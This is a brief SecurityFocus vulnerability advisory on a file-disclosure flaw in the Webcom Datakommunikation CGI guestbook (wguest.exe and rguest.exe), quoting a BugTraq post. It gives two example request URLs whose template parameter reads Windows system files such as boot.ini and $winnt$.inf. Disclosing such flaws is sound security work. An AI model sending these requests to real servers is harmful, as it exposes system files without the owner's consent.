Webcom Datakommunikation CGI Guestbook rguest/wguest Vulnerability

Examples quoted directly from David Litchfield's BugTraq Post (See credit):

A request for http://server/cgi-bin/wguest.exe?template=c:\boot.ini will return the remote Web server's boot.ini and http://server/cgi-bin/rguest.exe?template=c:\winnt\system32\$winnt$.inf will return the $winnt$.inf file


 

Privacy Statement
Copyright 2010, SecurityFocus